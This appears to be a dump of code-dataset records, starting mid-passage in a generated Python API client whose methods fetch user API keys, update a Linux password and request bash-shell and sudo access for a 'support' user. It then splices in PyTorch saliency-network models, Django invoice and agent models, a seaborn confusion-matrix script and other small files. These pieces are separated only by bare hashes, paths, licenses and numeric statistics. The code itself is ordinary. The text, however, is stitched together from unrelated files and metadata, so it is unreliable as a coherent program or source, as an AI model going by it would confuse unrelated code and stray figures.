a list of user sids. Returns: list of ApiKey: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('get_all_user_api_keys called.') # Prepare query URL self.logger.info( 'Preparing query URL for get_all_user_api_keys.') _url_path = '/public/usersApiKeys' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_parameters = {'userSids': user_sids} _query_builder = APIHelper.append_url_with_query_parameters( _query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for get_all_user_api_keys.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info( 'Preparing and executing request for get_all_user_api_keys.') _request = self.http_client.get(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='get_all_user_api_keys') # Endpoint and global error handling using HTTP status codes. self.logger.info( 'Validating response for get_all_user_api_keys.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, ApiKey.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def update_linux_credentials(self, body): """Does a PUT request to /public/users/linuxPassword. Update linux user password. Args: body (UpdateLinuxPasswordReqParams): Request to update a View. Returns: UpdateLinuxPasswordResult: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('update_linux_credentials called.') # Validate required parameters self.logger.info( 'Validating required parameters for update_linux_credentials.') self.validate_parameters(body=body) # Prepare query URL self.logger.info('Preparing query URL for update_linux_credentials.') _url_path = '/public/users/linuxPassword' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for update_linux_credentials.') _headers = { 'accept': 'application/json', 'content-type': 'application/json; charset=utf-8' } # Prepare and execute request self.logger.info( 'Preparing and executing request for update_linux_credentials.') _request = self.http_client.put( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='update_linux_credentials') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for update_linux_credentials.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, UpdateLinuxPasswordResult.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def linux_support_user_bash_shell_access(self, body): """Does a PUT request to /public/users/linuxSupportUserBashShellAccess. Requests Linux 'support' user bash shell access. Args: body (LinuxSupportUserBashShellAccessReqParams): Request to update a View. Returns: LinuxSupportUserBashShellAccessResult: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('linux_support_user_bash_shell_access called.') # Validate required parameters self.logger.info( 'Validating required parameters for linux_support_user_bash_shell_access.') self.validate_parameters(body=body) # Prepare query URL self.logger.info('Preparing query URL for linux_support_user_bash_shell_access.') _url_path = '/public/users/linuxSupportUserBashShellAccess' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for linux_support_user_bash_shell_access.') _headers = { 'accept': 'application/json', 'content-type': 'application/json; charset=utf-8' } # Prepare and execute request self.logger.info( 'Preparing and executing request for linux_support_user_bash_shell_access.') _request = self.http_client.put( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='linux_support_user_bash_shell_access') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for linux_support_user_bash_shell_access.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, LinuxSupportUserBashShellAccessResult.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def linux_support_user_sudo_access(self, body): """Does a PUT request to /public/users/linuxSupportUserSudoAccess. Requests Linux 'support' user sudo access. Args: body (LinuxSupportUserSudoAccessReqParams): Request to update a View. Returns: LinuxSupportUserSudoAccessResult: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('linux_support_user_sudo_access called.') # Validate required parameters self.logger.info( 'Validating required parameters for linux_support_user_sudo_access.') self.validate_parameters(body=body) # Prepare query URL self.logger.info('Preparing query URL for linux_support_user_sudo_access.') _url_path = '/public/users/linuxSupportUserSudoAccess' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for linux_support_user_sudo_access.') _headers = { 'accept': 'application/json', 'content-type': 'application/json; charset=utf-8' } # Prepare and execute request self.logger.info( 'Preparing and executing request for linux_support_user_sudo_access.') _request = self.http_client.put( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='linux_support_user_sudo_access') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for linux_support_user_sudo_access.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, LinuxSupportUserSudoAccessResult.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise
41.207308
124
0.605512
5,924
55,259
5.423363
0.053511
0.040463
0.047498
0.042237
0.820966
0.787257
0.774402
0.757532
0.744833
0.731169
0
0.001376
0.329394
55,259
1,340
125
41.23806
0.865612
0.298847
0
0.651128
0
0
0.192131
0.053467
0
0
0
0
0
1
0.031579
false
0.004511
0.022556
0
0.081203
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
acf0a871528321495731aac966d8add3d5ebfe7f
16,454
py
Python
SimpleNet/model.py
chhanganivarun/saliency
a9edbd7d89d1e170bfb5056eb48e7a103d489995
[ "MIT" ]
29
2020-03-15T12:06:58.000Z
2022-02-01T09:40:48.000Z
SimpleNet/model.py
chhanganivarun/saliency
a9edbd7d89d1e170bfb5056eb48e7a103d489995
[ "MIT" ]
16
2020-03-18T07:26:36.000Z
2022-03-12T00:44:07.000Z
SimpleNet/model.py
chhanganivarun/saliency
a9edbd7d89d1e170bfb5056eb48e7a103d489995
[ "MIT" ]
13
2020-03-15T12:07:00.000Z
2021-10-30T14:42:59.000Z
import torchvision.models as models import torch import torch.nn as nn import torch.nn.functional as F import sys sys.path.append('../PNAS/') from PNASnet import * from genotypes import PNASNet class PNASModel(nn.Module): def __init__(self, num_channels=3, train_enc=False, load_weight=1): super(PNASModel, self).__init__() self.path = '../PNAS/PNASNet-5_Large.pth' self.pnas = NetworkImageNet(216, 1001, 12, False, PNASNet) if load_weight: self.pnas.load_state_dict(torch.load(self.path)) for param in self.pnas.parameters(): param.requires_grad = train_enc self.padding = nn.ConstantPad2d((0,1,0,1),0) self.drop_path_prob = 0 self.linear_upsampling = nn.UpsamplingBilinear2d(scale_factor=2) self.deconv_layer0 = nn.Sequential( nn.Conv2d(in_channels = 4320, out_channels = 512, kernel_size=3, padding=1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer1 = nn.Sequential( nn.Conv2d(in_channels = 512+2160, out_channels = 256, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer2 = nn.Sequential( nn.Conv2d(in_channels = 1080+256, out_channels = 270, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer3 = nn.Sequential( nn.Conv2d(in_channels = 540, out_channels = 96, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer4 = nn.Sequential( nn.Conv2d(in_channels = 192, out_channels = 128, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer5 = nn.Sequential( nn.Conv2d(in_channels = 128, out_channels = 128, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), nn.Conv2d(in_channels = 128, out_channels = 1, kernel_size = 3, padding = 1, bias = True), nn.Sigmoid() ) def forward(self, images): batch_size = images.size(0) s0 = self.pnas.conv0(images) s0 = self.pnas.conv0_bn(s0) out1 = self.padding(s0) s1 = self.pnas.stem1(s0, s0, self.drop_path_prob) out2 = s1 s0, s1 = s1, self.pnas.stem2(s0, s1, 0) for i, cell in enumerate(self.pnas.cells): s0, s1 = s1, cell(s0, s1, 0) if i==3: out3 = s1 if i==7: out4 = s1 if i==11: out5 = s1 out5 = self.deconv_layer0(out5) x = torch.cat((out5,out4), 1) x = self.deconv_layer1(x) x = torch.cat((x,out3), 1) x = self.deconv_layer2(x) x = torch.cat((x,out2), 1) x = self.deconv_layer3(x) x = torch.cat((x,out1), 1) x = self.deconv_layer4(x) x = self.deconv_layer5(x) x = x.squeeze(1) return x class DenseModel(nn.Module): def __init__(self, num_channels=3, train_enc=False, load_weight=1): super(DenseModel, self).__init__() self.dense = models.densenet161(pretrained=bool(load_weight)).features for param in self.dense.parameters(): param.requires_grad = train_enc self.linear_upsampling = nn.UpsamplingBilinear2d(scale_factor=2) self.conv_layer0 = nn.Sequential(*list(self.dense)[:3]) self.conv_layer1 = nn.Sequential( self.dense.pool0, self.dense.denseblock1, *list(self.dense.transition1)[:3] ) self.conv_layer2 = nn.Sequential( self.dense.transition1[3], self.dense.denseblock2, *list(self.dense.transition2)[:3] ) self.conv_layer3 = nn.Sequential( self.dense.transition2[3], self.dense.denseblock3, *list(self.dense.transition3)[:3] ) self.conv_layer4 = nn.Sequential( self.dense.transition3[3], self.dense.denseblock4 ) self.deconv_layer0 = nn.Sequential( nn.Conv2d(in_channels = 2208, out_channels = 512, kernel_size=3, padding=1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer1 = nn.Sequential( nn.Conv2d(in_channels = 512+1056, out_channels = 256, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer2 = nn.Sequential( nn.Conv2d(in_channels = 384+256, out_channels = 192, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer3 = nn.Sequential( nn.Conv2d(in_channels = 192+192, out_channels = 96, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer4 = nn.Sequential( nn.Conv2d(in_channels = 96+96, out_channels = 128, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer5 = nn.Sequential( nn.Conv2d(in_channels = 128, out_channels = 128, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), nn.Conv2d(in_channels = 128, out_channels = 1, kernel_size = 3, padding = 1, bias = True), nn.Sigmoid() ) def forward(self, images): batch_size = images.size(0) out1 = self.conv_layer0(images) out2 = self.conv_layer1(out1) out3 = self.conv_layer2(out2) out4 = self.conv_layer3(out3) out5 = self.conv_layer4(out4) assert out1.size() == (batch_size, 96, 128, 128) assert out2.size() == (batch_size, 192, 64, 64) assert out3.size() == (batch_size, 384, 32, 32) assert out4.size() == (batch_size, 1056, 16, 16) assert out5.size() == (batch_size, 2208, 8, 8) out5 = self.deconv_layer0(out5) x = torch.cat((out5,out4), 1) x = self.deconv_layer1(x) x = torch.cat((x,out3), 1) x = self.deconv_layer2(x) x = torch.cat((x,out2), 1) x = self.deconv_layer3(x) x = torch.cat((x,out1), 1) x = self.deconv_layer4(x) x = self.deconv_layer5(x) x = x.squeeze(1) return x class ResNetModel(nn.Module): def __init__(self, num_channels=3, train_enc=False, load_weight=1): super(ResNetModel, self).__init__() self.num_channels = num_channels self.resnet = models.resnet50(pretrained=bool(load_weight)) for param in self.resnet.parameters(): param.requires_grad = train_enc self.conv_layer1 = nn.Sequential( self.resnet.conv1, self.resnet.bn1, self.resnet.relu ) self.conv_layer2 = nn.Sequential( self.resnet.maxpool, self.resnet.layer1 ) self.conv_layer3 = self.resnet.layer2 self.conv_layer4 = self.resnet.layer3 self.conv_layer5 = self.resnet.layer4 self.linear_upsampling = nn.UpsamplingBilinear2d(scale_factor=2) self.deconv_layer0 = nn.Sequential( nn.Conv2d(in_channels=2048, out_channels=1024, kernel_size=3, padding=1, bias=True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer1 = nn.Sequential( nn.Conv2d(in_channels = 2048, out_channels = 512, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer2 = nn.Sequential( nn.Conv2d(in_channels = 1024, out_channels = 256, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer3 = nn.Sequential( nn.Conv2d(in_channels = 512, out_channels = 64, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer4 = nn.Sequential( nn.Conv2d(in_channels = 128, out_channels = 64, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer5 = nn.Sequential( nn.Conv2d(in_channels = 64, out_channels = 64, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), nn.Conv2d(in_channels = 64, out_channels = 1, kernel_size = 3, padding = 1, bias = True), nn.Sigmoid() ) def forward(self, images): batch_size = images.size(0) out1 = self.conv_layer1(images) out2 = self.conv_layer2(out1) out3 = self.conv_layer3(out2) out4 = self.conv_layer4(out3) out5 = self.conv_layer5(out4) out5 = self.deconv_layer0(out5) assert out5.size() == (batch_size, 1024, 16, 16) x = torch.cat((out5,out4), 1) assert x.size() == (batch_size, 2048, 16, 16) x = self.deconv_layer1(x) assert x.size() == (batch_size, 512, 32, 32) x = torch.cat((x, out3), 1) assert x.size() == (batch_size, 1024, 32, 32) x = self.deconv_layer2(x) assert x.size() == (batch_size, 256, 64, 64) x = torch.cat((x, out2), 1) assert x.size() == (batch_size, 512, 64, 64) x = self.deconv_layer3(x) assert x.size() == (batch_size, 64, 128, 128) x = torch.cat((x, out1), 1) assert x.size() == (batch_size, 128, 128, 128) x = self.deconv_layer4(x) x = self.deconv_layer5(x) assert x.size() == (batch_size, 1, 256, 256) x = x.squeeze(1) assert x.size() == (batch_size, 256, 256) return x class VGGModel(nn.Module): def __init__(self, num_channels=3, train_enc=False, load_weight=1): super(VGGModel, self).__init__() self.num_channels = num_channels self.vgg = models.vgg16(pretrained=bool(load_weight)).features for param in self.vgg.parameters(): param.requires_grad = train_enc self.conv_layer1 = self.vgg[:7] self.conv_layer2 = self.vgg[7:12] self.conv_layer3 = self.vgg[12:19] self.conv_layer4 = self.vgg[19:24] self.conv_layer5 = self.vgg[24:] self.linear_upsampling = nn.UpsamplingBilinear2d(scale_factor=2) self.deconv_layer1 = nn.Sequential( nn.Conv2d(in_channels = 1024, out_channels = 512, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer2 = nn.Sequential( nn.Conv2d(in_channels = 1024, out_channels = 256, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer3 = nn.Sequential( nn.Conv2d(in_channels = 512, out_channels = 128, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer4 = nn.Sequential( nn.Conv2d(in_channels = 256, out_channels = 128, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer5 = nn.Sequential( nn.Conv2d(in_channels = 128, out_channels = 128, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), nn.Conv2d(in_channels = 128, out_channels = 1, kernel_size = 3, padding = 1, bias = True), nn.Sigmoid() ) def forward(self, images): batch_size = images.size(0) out1 = self.conv_layer1(images) out2 = self.conv_layer2(out1) out3 = self.conv_layer3(out2) out4 = self.conv_layer4(out3) out5 = self.conv_layer5(out4) out5 = self.linear_upsampling(out5) assert out5.size() == (batch_size, 512, 16, 16) x = torch.cat((out5,out4), 1) assert x.size() == (batch_size, 1024, 16, 16) x = self.deconv_layer1(x) assert x.size() == (batch_size, 512, 32, 32) x = torch.cat((x, out3), 1) assert x.size() == (batch_size, 1024, 32, 32) x = self.deconv_layer2(x) assert x.size() == (batch_size, 256, 64, 64) x = torch.cat((x, out2), 1) assert x.size() == (batch_size, 512, 64, 64) x = self.deconv_layer3(x) assert x.size() == (batch_size, 128, 128, 128) x = torch.cat((x, out1), 1) assert x.size() == (batch_size, 256, 128, 128) x = self.deconv_layer4(x) x = self.deconv_layer5(x) assert x.size() == (batch_size, 1, 256, 256) x = x.squeeze(1) assert x.size() == (batch_size, 256, 256) return x class MobileNetV2(nn.Module): def __init__(self, num_channels=3, train_enc=False, load_weight=1): super(MobileNetV2, self).__init__() self.mobilenet = torch.hub.load('pytorch/vision:v0.4.0', 'mobilenet_v2', pretrained=True).features for param in self.mobilenet.parameters(): param.requires_grad = train_enc self.linear_upsampling = nn.UpsamplingBilinear2d(scale_factor=2) self.conv_layer1 = self.mobilenet[:2] self.conv_layer2 = self.mobilenet[2:4] self.conv_layer3 = self.mobilenet[4:7] self.conv_layer4 = self.mobilenet[7:14] self.conv_layer5 = self.mobilenet[14:] self.deconv_layer0 = nn.Sequential( nn.Conv2d(in_channels = 1280, out_channels = 96, kernel_size=3, padding=1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer1 = nn.Sequential( nn.Conv2d(in_channels = 96+96, out_channels = 32, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer2 = nn.Sequential( nn.Conv2d(in_channels = 32+32, out_channels = 24, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer3 = nn.Sequential( nn.Conv2d(in_channels = 24+24, out_channels = 16, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer4 = nn.Sequential( nn.Conv2d(in_channels = 16+16, out_channels = 16, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), self.linear_upsampling ) self.deconv_layer5 = nn.Sequential( nn.Conv2d(in_channels = 16, out_channels = 16, kernel_size = 3, padding = 1, bias = True), nn.ReLU(inplace=True), nn.Conv2d(in_channels = 16, out_channels = 1, kernel_size = 3, padding = 1, bias = True), nn.Sigmoid() ) def forward(self, images): batch_size = images.size(0) out1 = self.conv_layer1(images) out2 = self.conv_layer2(out1) out3 = self.conv_layer3(out2) out4 = self.conv_layer4(out3) out5 = self.conv_layer5(out4) assert out1.size() == (batch_size, 16, 128, 128) assert out2.size() == (batch_size, 24, 64, 64) assert out3.size() == (batch_size, 32, 32, 32) assert out4.size() == (batch_size, 96, 16, 16) assert out5.size() == (batch_size, 1280, 8, 8) out5 = self.deconv_layer0(out5) x = torch.cat((out5,out4), 1) x = self.deconv_layer1(x) x = torch.cat((x,out3), 1) x = self.deconv_layer2(x) x = torch.cat((x,out2), 1) x = self.deconv_layer3(x) x = torch.cat((x,out1), 1) x = self.deconv_layer4(x) x = self.deconv_layer5(x) x = x.squeeze(1) return x
36.242291
109
0.573842
2,110
16,454
4.308057
0.073934
0.063806
0.037404
0.067327
0.816942
0.79758
0.775908
0.743234
0.734873
0.69637
0
0.076567
0.304668
16,454
454
110
36.242291
0.717944
0
0
0.569149
0
0
0.004132
0.002917
0
0
0
0
0.079787
1
0.026596
false
0
0.018617
0
0.071809
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
4a01cb19e48cb06ea6831681ce677d691c2fee27
208
py
Python
sar_objects/__init__.py
goldmanm/atmospheric-sar-comparison
a0d84a27b0fd23a1ed592a6bc859e8d5b054fc47
[ "MIT" ]
null
null
null
sar_objects/__init__.py
goldmanm/atmospheric-sar-comparison
a0d84a27b0fd23a1ed592a6bc859e8d5b054fc47
[ "MIT" ]
null
null
null
sar_objects/__init__.py
goldmanm/atmospheric-sar-comparison
a0d84a27b0fd23a1ed592a6bc859e8d5b054fc47
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from atkinson2007 import sar as sar_a from vereecken2009 import sar as sar_v from orlando2003 import sar as sar_o from mereau2000 import sar as sar_m sars = [sar_a,sar_v,sar_o,sar_m]
26
38
0.769231
40
208
3.8
0.4
0.236842
0.289474
0.368421
0
0
0
0
0
0
0
0.097143
0.158654
208
8
39
26
0.771429
0.100962
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.8
0
0.8
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
6
4a0287a86b2fbb9578b7c13333948d663626f7ec
4,052
py
Python
entities/models.py
AdirthaBorgohain/Agency-CRM
9e9f377c5967fdd20230ab8b558623dc2a1a6403
[ "MIT" ]
null
null
null
entities/models.py
AdirthaBorgohain/Agency-CRM
9e9f377c5967fdd20230ab8b558623dc2a1a6403
[ "MIT" ]
null
null
null
entities/models.py
AdirthaBorgohain/Agency-CRM
9e9f377c5967fdd20230ab8b558623dc2a1a6403
[ "MIT" ]
null
null
null
from django.db import models from datetime import datetime # Create your models here. CATEGORY_CHOICES = ( ("Newspaper", "Newspaper"), ("Magazine", "Magazine") ) LANGUAGE_CHOICES = ( ("Assamese", "Assamese"), ("English", "English"), ("Hindi", "Hindi"), ("Bengali", "Bengali"), ("Others", "Others") ) class Customer(models.Model): id = models.CharField(max_length=8, primary_key=True) name = models.CharField(max_length=100) address = models.CharField(max_length=100) contact = models.CharField(max_length=12, unique=True) def __str__(self): return self.name @property def encoded_id(self): return self.id.replace('/', '__') class Agent(models.Model): id = models.CharField(max_length=8, primary_key=True) name = models.CharField(max_length=100) address = models.CharField(max_length=100) contact = models.CharField(max_length=12, unique=True) commission = models.DecimalField(max_digits=10, decimal_places=2) def __str__(self): return self.name @property def encoded_id(self): return self.id.replace('/', '__') class Product(models.Model): name = models.CharField(max_length=20, unique=True) language = models.CharField( max_length=10, choices=LANGUAGE_CHOICES, default="Assamese") category = models.CharField( max_length=10, choices=CATEGORY_CHOICES, default="Newspaper") price = models.DecimalField(max_digits=10, decimal_places=2) def __str__(self): return self.name class Invoice(models.Model): customer = models.ForeignKey(Customer, on_delete=models.CASCADE) create_date = models.DateField() start_date = models.DateField() end_date = models.DateField() additional_charges = models.DecimalField(max_digits=10, decimal_places=2, default=0) grand_total = models.DecimalField(max_digits=10, decimal_places=2) paid_amount = models.DecimalField(max_digits=10, decimal_places=2) is_paid = models.BooleanField(default=False) def __str__(self): return self.customer.name + " (" + str(self.start_date.strftime("%B")) + ")" @property def bill_period(self): return '{} -- {}'.format(self.start_date.strftime("%d/%m/%Y"), self.end_date.strftime("%d/%m/%Y")) class Bill(models.Model): agent = models.ForeignKey(Agent, on_delete=models.CASCADE) create_date = models.DateField() start_date = models.DateField() end_date = models.DateField() deductions = models.DecimalField(max_digits=10, decimal_places=2, default=0) prev_balance = models.DecimalField(max_digits=10, decimal_places=2) grand_total = models.DecimalField(max_digits=10, decimal_places=2) paid_amount = models.DecimalField(max_digits=10, decimal_places=2) is_paid = models.BooleanField(default=False) def __str__(self): return self.agent.name + " (" + str(self.start_date.strftime("%B")) + ")" @property def bill_period(self): return '{} -- {}'.format(self.start_date.strftime("%d/%m/%Y"), self.end_date.strftime("%d/%m/%Y")) class OrderDetails(models.Model): invoice = models.ForeignKey(Invoice, on_delete=models.CASCADE) product = models.ForeignKey(Product, on_delete=models.DO_NOTHING) quantity = models.IntegerField() price = models.DecimalField(max_digits=10, decimal_places=2) net_price = models.DecimalField(max_digits=10, decimal_places=2) def __str__(self): return self.invoice.customer.name + " (" + str(self.invoice.start_date.strftime("%B")) + ")-" + self.product.name class BillDetails(models.Model): bill = models.ForeignKey(Bill, on_delete=models.CASCADE) product = models.ForeignKey(Product, on_delete=models.DO_NOTHING) quantity = models.IntegerField() price = models.DecimalField(max_digits=10, decimal_places=2) net_price = models.DecimalField(max_digits=10, decimal_places=2) def __str__(self): return self.bill.agent.name + " (" + str(self.bill.start_date.strftime("%B")) + ")-" + self.product.name
34.931034
121
0.695459
508
4,052
5.32874
0.181102
0.086443
0.10085
0.129664
0.762468
0.752124
0.727743
0.703362
0.687477
0.687477
0
0.019202
0.16461
4,052
115
122
35.234783
0.780502
0.005923
0
0.579545
0
0
0.047938
0
0
0
0
0
0
1
0.125
false
0
0.022727
0.125
0.806818
0
0
0
0
null
0
0
0
0
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
1
0
0
6
c58cdbf221c6c8a82b0f7387741212b650f10f79
254
py
Python
mastml/__init__.py
coleerickson/MAST-ML
3b1335becdf616e5a7541d71b675f787605da048
[ "MIT" ]
null
null
null
mastml/__init__.py
coleerickson/MAST-ML
3b1335becdf616e5a7541d71b675f787605da048
[ "MIT" ]
null
null
null
mastml/__init__.py
coleerickson/MAST-ML
3b1335becdf616e5a7541d71b675f787605da048
[ "MIT" ]
null
null
null
# Hide benign warnings # https://github.com/numpy/numpy/pull/432/commits/170ed4e?diff=split import warnings warnings.filterwarnings("ignore", message=r".*numpy\.dtype size changed.*") warnings.filterwarnings("ignore", message="numpy.ufunc size changed")
42.333333
75
0.783465
33
254
6.030303
0.666667
0.221106
0.281407
0.351759
0
0
0
0
0
0
0
0.029412
0.062992
254
5
76
50.8
0.806723
0.34252
0
0
0
0
0.396341
0
0
0
0
0
0
1
0
true
0
0.333333
0
0.333333
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
6
6816fcbad0dedeaad73384153b25add7cb155dca
96
py
Python
venv/lib/python3.8/site-packages/cryptography/hazmat/primitives/asymmetric/utils.py
Retraces/UkraineBot
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
[ "MIT" ]
2
2022-03-13T01:58:52.000Z
2022-03-31T06:07:54.000Z
venv/lib/python3.8/site-packages/cryptography/hazmat/primitives/asymmetric/utils.py
DesmoSearch/Desmobot
b70b45df3485351f471080deb5c785c4bc5c4beb
[ "MIT" ]
19
2021-11-20T04:09:18.000Z
2022-03-23T15:05:55.000Z
venv/lib/python3.8/site-packages/cryptography/hazmat/primitives/asymmetric/utils.py
DesmoSearch/Desmobot
b70b45df3485351f471080deb5c785c4bc5c4beb
[ "MIT" ]
null
null
null
/home/runner/.cache/pip/pool/b9/7d/f2/a389e0207769f5fe8fe4011898ec22b9256943898bfe1f24c8ffc71f2f
96
96
0.895833
9
96
9.555556
1
0
0
0
0
0
0
0
0
0
0
0.427083
0
96
1
96
96
0.46875
0
0
0
0
0
0
0
0
1
0
0
0
0
null
null
0
0
null
null
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
1
0
0
0
1
0
0
0
0
0
0
0
0
6
a8d580286fd6e40c8c83c0badc74cb88ced660ca
1,039
py
Python
extras/plot_confusion_matrix.py
SHANK885/PKNN-MIFS
5e3e2ecd3719db2ed83f0c7a264950a914258670
[ "MIT" ]
null
null
null
extras/plot_confusion_matrix.py
SHANK885/PKNN-MIFS
5e3e2ecd3719db2ed83f0c7a264950a914258670
[ "MIT" ]
null
null
null
extras/plot_confusion_matrix.py
SHANK885/PKNN-MIFS
5e3e2ecd3719db2ed83f0c7a264950a914258670
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- import seaborn as sn import pandas as pd import matplotlib.pyplot as plt array = [[228, 0, 0, 1, 4, 27, 4, 3, 0, 1, 0, 0], [ 0, 1, 0, 0, 0, 0, 0, 0, 0 , 0, 0, 0], [ 0, 0, 1, 0, 1, 0, 0, 0, 0 , 0 , 0, 0], [ 4, 0, 1, 15, 5, 3, 0, 1, 0 , 0 , 1, 0], [ 6, 0, 0, 0, 38, 6 , 1 , 0 , 0 , 0, 1, 0], [ 32, 0, 0, 1, 2, 81 , 5 , 1 , 0 , 0 , 0, 0], [ 6, 0, 0, 0, 0, 2 , 20 , 1 , 0 , 0 , 0, 0], [ 9, 0, 0, 0, 6, 0 , 1 , 15 , 0 ,0 , 0, 0], [ 1, 0, 0, 0, 0, 1, 0, 0, 38 , 0 , 0, 1], [ 1, 0, 0, 0, 0, 0, 0, 0, 0 , 2 , 0 , 0], [ 1, 0, 1, 0, 1, 0, 0, 0, 0, 0 ,31 , 0], [ 2, 0, 0, 0, 1, 0, 0 , 0, 0, 0, 0, 11]] df_cm = pd.DataFrame(array, range(len(array)), range(len(array))) plt.figure(figsize = (10,7)) sn.set(font_scale=1.4) sn.heatmap(df_cm, annot=True,annot_kws={"size": 16})# font size
43.291667
70
0.346487
195
1,039
1.825641
0.246154
0.359551
0.36236
0.314607
0.308989
0.213483
0.185393
0.174157
0.151685
0.073034
0
0.283247
0.442733
1,039
23
71
45.173913
0.331606
0.029836
0
0
0
0
0.00398
0
0
0
0
0
0
1
0
false
0
0.157895
0
0.157895
0
0
0
1
null
1
1
1
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
7651877017b092874f87f27073ef8923979b9ec4
65
py
Python
